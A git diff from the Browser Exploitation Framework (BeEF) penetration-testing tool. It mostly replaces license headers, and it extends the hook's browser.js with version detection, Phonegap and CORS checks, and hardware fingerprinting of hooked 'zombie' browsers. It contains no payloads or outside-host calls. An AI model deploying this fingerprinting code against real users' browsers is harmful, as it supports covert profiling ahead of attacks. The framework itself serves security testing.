distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/modules.rb b/core/api/modules.rb index 1ee8b1a38..22edb88e5 100644 --- a/core/api/modules.rb +++ b/core/api/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/bootstrap.rb b/core/bootstrap.rb index 0ae748c22..4244f20db 100644 --- a/core/bootstrap.rb +++ b/core/bootstrap.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -50,6 +40,7 @@ require 'core/hbmanager' ## @note Include RESTful API require 'core/main/rest/handlers/hookedbrowsers' require 'core/main/rest/handlers/modules' +require 'core/main/rest/handlers/categories' require 'core/main/rest/handlers/logs' require 'core/main/rest/handlers/admin' require 'core/main/rest/api' diff --git a/core/core.rb b/core/core.rb index dc554314b..2adf0c1cb 100644 --- a/core/core.rb +++ b/core/core.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -34,6 +24,7 @@ require 'core/main/constants/browsers' require 'core/main/constants/commandmodule' require 'core/main/constants/distributedengine' require 'core/main/constants/os' +require 'core/main/constants/hardware' # @note Include core modules for beef require 'core/main/configuration' diff --git a/core/extension.rb b/core/extension.rb index 7b52fe344..3c7f8dd16 100644 --- a/core/extension.rb +++ b/core/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/core/extensions.rb b/core/extensions.rb index f5f2026f2..5b0c0390c 100644 --- a/core/extensions.rb +++ b/core/extensions.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extensions diff --git a/core/filters.rb b/core/filters.rb index 1522bb250..be9eda17e 100644 --- a/core/filters.rb +++ b/core/filters.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/base.rb b/core/filters/base.rb index 14492577b..8b932696a 100644 --- a/core/filters/base.rb +++ b/core/filters/base.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/browser.rb b/core/filters/browser.rb index f955fb6f6..af1e3932c 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters @@ -47,6 +37,16 @@ module Filters true end + # Check the Hardware name value - for example, 'iPhone' + # @param [String] str String for testing + # @return [Boolean] If the string has valid Hardware name characters + def self.is_valid_hwname?(str) + return false if not is_non_empty_string?(str) + return false if has_non_printable_char?(str) + return false if str.length < 2 + true + end + # Verify the browser version string is valid # @param [String] str String for testing # @return [Boolean] If the string has valid browser version characters diff --git a/core/filters/command.rb b/core/filters/command.rb index dcb779a8b..fbff0b977 100644 --- a/core/filters/command.rb +++ b/core/filters/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/http.rb b/core/filters/http.rb index 74e316d03..b34ee47d8 100644 --- a/core/filters/http.rb +++ b/core/filters/http.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/page.rb b/core/filters/page.rb index b75852f18..354e10877 100644 --- a/core/filters/page.rb +++ b/core/filters/page.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/hbmanager.rb b/core/hbmanager.rb index cd5eb8bc0..caea676de 100644 --- a/core/hbmanager.rb +++ b/core/hbmanager.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module HBManager diff --git a/core/loader.rb b/core/loader.rb index 3ba04c62f..4a947536c 100644 --- a/core/loader.rb +++ b/core/loader.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. # @note Include here all the gems we are using require 'rubygems' diff --git a/core/main/client/are.js b/core/main/client/are.js new file mode 100644 index 000000000..fbb6e53e3 --- /dev/null +++ b/core/main/client/are.js @@ -0,0 +1,16 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.are = { + init:function(){ + var Jools = require('jools'); + this.ruleEngine = new Jools(); + }, + rules:[], + commands:[], + results:[] +}; +beef.regCmp("beef.are"); \ No newline at end of file diff --git a/core/main/client/beef.js b/core/main/client/beef.js index b580c936c..41fab94a9 100644 --- a/core/main/client/beef.js +++ b/core/main/client/beef.js @@ -1,27 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * BeEF JS Library <%= @beef_version %> - * http://beef.googlecode.com/ + * Register the BeEF JS on the window object. */ $j = jQuery.noConflict(); -//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>'; - if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { var BeefJS = { diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 762072108..cb32204dc 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * @literal object: beef.browser * @@ -60,12 +51,22 @@ beef.browser = { return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance; }, + /** + * + * Returns true if IE10. + * @example: beef.browser.isIE10() + */ + // placeholder + isIE10: function() { + return false; + }, + /** * Returns true if IE. * @example: beef.browser.isIE() */ isIE: function() { - return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9(); + return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10(); }, /** @@ -180,12 +181,44 @@ beef.browser = { return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; }, + /** + * Returns true if FF14 + * @example: beef.browser.isFF14() + */ + isFF14: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null; + }, + + /** + * Returns true if FF15 + * @example: beef.browser.isFF15() + */ + isFF15: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null; + }, + + /** + * Returns true if FF16 + * @example: beef.browser.isFF16() + */ + isFF16: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null; + }, + + /** + * Returns true if FF17 + * @example: beef.browser.isFF17() + */ + isFF17: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null; + }, + /** * Returns true if FF. * @example: beef.browser.isFF() */ isFF: function() { - return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13(); + return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17(); }, /** @@ -193,7 +226,7 @@ beef.browser = { * @example: beef.browser.isS4() */ isS4: function() { - return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); }, /** @@ -201,7 +234,15 @@ beef.browser = { * @example: beef.browser.isS5() */ isS5: function() { - return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); + }, + + /** + * Returns true if Safari 6.xx + * @example: beef.browser.isS6() + */ + isS6: function() { + return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); }, /** @@ -209,7 +250,7 @@ beef.browser = { * @example: beef.browser.isS() */ isS: function() { - return this.isS4() || this.isS5() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + return this.isS4() || this.isS5() || this.isS6(); }, /** @@ -332,12 +373,44 @@ beef.browser = { return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false); }, + /** + * Returns true if Chrome 20. + * @example: beef.browser.isC20() + */ + isC20: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false); + }, + + /** + * Returns true if Chrome 21. + * @example: beef.browser.isC21() + */ + isC21: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false); + }, + + /** + * Returns true if Chrome 22. + * @example: beef.browser.isC22() + */ + isC22: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false); + }, + + /** + * Returns true if Chrome 23. + * @example: beef.browser.isC23() + */ + isC23: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false); + }, + /** * Returns true if Chrome. * @example: beef.browser.isC() */ isC: function() { - return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19(); + return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23(); }, /** @@ -372,12 +445,20 @@ beef.browser = { return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null)); }, + /** + * Returns true if Opera 12.xx. + * @example: beef.browser.isO12() + */ + isO12: function() { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null)); + }, + /** * Returns true if Opera. * @example: beef.browser.isO() */ isO: function() { - return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11(); + return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12(); }, /** @@ -401,9 +482,13 @@ beef.browser = { C14: this.isC14(), // Chrome 14 C15: this.isC15(), // Chrome 15 C16: this.isC16(), // Chrome 16 - C17: this.isC17(), // Chrome 17 + C17: this.isC17(), // Chrome 17 C18: this.isC18(), // Chrome 18 C19: this.isC19(), // Chrome 19 + C20: this.isC20(), // Chrome 20 + C21: this.isC21(), // Chrome 21 + C22: this.isC22(), // Chrome 22 + C23: this.isC23(), // Chrome 23 C: this.isC(), // Chrome any version FF2: this.isFF2(), // Firefox 2 @@ -420,22 +505,29 @@ beef.browser = { FF11: this.isFF11(), // Firefox 11 FF12: this.isFF12(), // Firefox 12 FF13: this.isFF13(), // Firefox 13 + FF14: this.isFF14(), // Firefox 14 + FF15: this.isFF15(), // Firefox 15 + FF16: this.isFF16(), // Firefox 16 + FF17: this.isFF17(), // Firefox 17 FF: this.isFF(), // Firefox any version IE6: this.isIE6(), // Internet Explorer 6 IE7: this.isIE7(), // Internet Explorer 7 IE8: this.isIE8(), // Internet Explorer 8 IE9: this.isIE9(), // Internet Explorer 9 + IE10: this.isIE10(), // Internet Explorer 10 IE: this.isIE(), // Internet Explorer any version O9_52: this.isO9_52(), // Opera 9.50 through 9.52 O9_60: this.isO9_60(), // Opera 9.60 through 9.64 O10: this.isO10(), // Opera 10.xx O11: this.isO11(), // Opera 11.xx + O12: this.isO12(), // Opera 11.xx O: this.isO(), // Opera any version S4: this.isS4(), // Safari 4.xx S5: this.isS5(), // Safari 5.xx + S6: this.isS6(), // Safari 6.x S: this.isS() // Safari any version } }, @@ -460,11 +552,15 @@ beef.browser = { if (this.isC14()) { return '14' }; // Chrome 14 if (this.isC15()) { return '15' }; // Chrome 15 if (this.isC16()) { return '16' }; // Chrome 16 - if (this.isC17()) { return '17' }; // Chrome 17 - if (this.isC18()) { return '18' }; // Chrome 18 - if (this.isC19()) { return '19' }; // Chrome 19 + if (this.isC17()) { return '17' }; // Chrome 17 + if (this.isC18()) { return '18' }; // Chrome 18 + if (this.isC19()) { return '19' }; // Chrome 19 + if (this.isC20()) { return '20' }; // Chrome 20 + if (this.isC21()) { return '21' }; // Chrome 21 + if (this.isC22()) { return '22' }; // Chrome 22 + if (this.isC23()) { return '23' }; // Chrome 23 - if (this.isFF2()) { return '2' }; // Firefox 2 + if (this.isFF2()) { return '2' }; // Firefox 2 if (this.isFF3()) { return '3' }; // Firefox 3 if (this.isFF3_5()) { return '3.5'}; // Firefox 3.5 if (this.isFF3_6()) { return '3.6'}; // Firefox 3.6 @@ -478,19 +574,26 @@ beef.browser = { if (this.isFF11()) { return '11' }; // Firefox 11 if (this.isFF12()) { return '12' }; // Firefox 12 if (this.isFF13()) { return '13' }; // Firefox 13 + if (this.isFF14()) { return '14' }; // Firefox 14 + if (this.isFF15()) { return '15' }; // Firefox 15 + if (this.isFF16()) { return '16' }; // Firefox 16 + if (this.isFF17()) { return '17' }; // Firefox 17 if (this.isIE6()) { return '6' }; // Internet Explorer 6 if (this.isIE7()) { return '7' }; // Internet Explorer 7 if (this.isIE8()) { return '8' }; // Internet Explorer 8 if (this.isIE9()) { return '9' }; // Internet Explorer 9 + if (this.isIE10()) { return '10' }; // Internet Explorer 10 if (this.isS4()) { return '4' }; // Safari 4 if (this.isS5()) { return '5' }; // Safari 5 + if (this.isS6()) { return '6' }; // Safari 5 if (this.isO9_52()) { return '9.5'}; // Opera 9.5x if (this.isO9_60()) { return '9.6'}; // Opera 9.6 if (this.isO10()) { return '10' }; // Opera 10.xx if (this.isO11()) { return '11' }; // Opera 11.xx + if (this.isO12()) { return '12' }; // Opera 12.xx return 'UNKNOWN'; // Unknown UA }, @@ -540,17 +643,45 @@ beef.browser = { }, /** - * Checks if the zombie has Java enabled. + * Checks if the zombie has Java enabled. * @return: {Boolean} true or false. - * - * @example: if(beef.browser.javaEnabled()) { ... } - */ + * + * @example: if(beef.browser.javaEnabled()) { ... } + */ javaEnabled: function() { return (!!window.navigator.javaEnabled()); }, + /** + * Checks if the Phonegap API is available from the hooked domain. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasPhonegap()) { ... } + */ + hasPhonegap: function() { + var result = false; + try { if (!!device.phonegap) result = true; else result = false; } + catch(e) { result = false; } + return result; + }, + + /** + * Checks if the browser supports CORS + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasCors()) { ... } + */ + hasCors: function() { + if ('withCredentials' in new XMLHttpRequest()) + return true; + else if (typeof XDomainRequest !== "undefined") + return true; + else + return false; + }, + /** * Checks if the zombie has Java installed and enabled. * @return: {Boolean} true or false. @@ -564,7 +695,7 @@ beef.browser = { return false; } - // This is a temporary fix as this does not work on Safari and Chrome + // This is a temporary fix as this does not work on Safari and Chrome // Chrome requires manual user intervention even with unsigned applets. // Safari requires a few seconds to load the applet. if (beef.browser.isC() || beef.browser.isS()) { @@ -586,7 +717,6 @@ beef.browser = { } catch(e) { return false; } - return false; }, /** @@ -765,6 +895,7 @@ beef.browser = { var browser_plugins = beef.browser.getPlugins(); var date_stamp = new Date().toString(); var os_name = beef.os.getName(); + var hw_name = beef.hardware.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); var screen_size = beef.browser.getScreenSize(); @@ -772,6 +903,7 @@ beef.browser = { var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; + var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No"; var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No"; var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No"; @@ -789,6 +921,7 @@ beef.browser = { if(hostport) details["HostPort"] = hostport; if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; + if(hw_name) details['Hardware'] = hw_name; if(date_stamp) details['DateStamp'] = date_stamp; if(system_platform) details['SystemPlatform'] = system_platform; if(browser_type) details['BrowserType'] = browser_type; @@ -797,6 +930,7 @@ beef.browser = { if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if(has_flash) details['HasFlash'] = has_flash + if(has_phonegap) details['HasPhonegap'] = has_phonegap if(has_web_socket) details['HasWebSocket'] = has_web_socket if(has_googlegears) details['HasGoogleGears'] = has_googlegears if(has_activex) details['HasActiveX'] = has_activex; @@ -850,7 +984,7 @@ beef.browser = { * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket * */ hasWebSocket: function() { - if (!!window.WebSocket || !!window.MozWebSocket) return true; else return false; + return !!window.WebSocket || !!window.MozWebSocket; }, /** diff --git a/core/main/client/browser/cookie.js b/core/main/client/browser/cookie.js index d9b7cce98..8dcba9c97 100644 --- a/core/main/client/browser/cookie.js +++ b/core/main/client/browser/cookie.js @@ -1,110 +1,101 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.browser.cookie - * - * Provides fuctions for working with cookies. - * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php - * Original author unknown. - * - */ -beef.browser.cookie = { - - setCookie: function (name, value, expires, path, domain, secure) - { - - var today = new Date(); - today.setTime( today.getTime() ); - - if ( expires ) - { - expires = expires * 1000 * 60 * 60 * 24; - } - var expires_date = new Date( today.getTime() + (expires) ); - - document.cookie = name + "=" +escape( value ) + - ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + - ( ( path ) ? ";path=" + path : "" ) + - ( ( domain ) ? ";domain=" + domain : "" ) + - ( ( secure ) ? ";secure" : "" ); - }, - - getCookie: function(name) - { - var a_all_cookies = document.cookie.split( ';' ); - var a_temp_cookie = ''; - var cookie_name = ''; - var cookie_value = ''; - var b_cookie_found = false; - - for ( i = 0; i < a_all_cookies.length; i++ ) - { - a_temp_cookie = a_all_cookies[i].split( '=' ); - cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); - if ( cookie_name == name ) - { - b_cookie_found = true; - if ( a_temp_cookie.length > 1 ) - { - cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); - } - return cookie_value; - break; - } - a_temp_cookie = null; - cookie_name = ''; - } - if ( !b_cookie_found ) - { - return null; - } - }, - - deleteCookie: function (name, path, domain) - { - if ( this.getCookie(name) ) document.cookie = name + "=" + - ( ( path ) ? ";path=" + path : "") + - ( ( domain ) ? ";domain=" + domain : "" ) + - ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; - }, - - hasSessionCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', '', '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - }, - - hasPersistentCookies: function (name) - { - var name = name || "cookie"; - if (name == "") name = "cookie"; - this.setCookie( name, 'none', 1, '/', '', '' ); - - cookiesEnabled = (this.getCookie(name) == null)? false:true; - this.deleteCookie(name, '/', ''); - return cookiesEnabled; - - } - -}; - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.browser.cookie + * + * Provides fuctions for working with cookies. + * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php + * Original 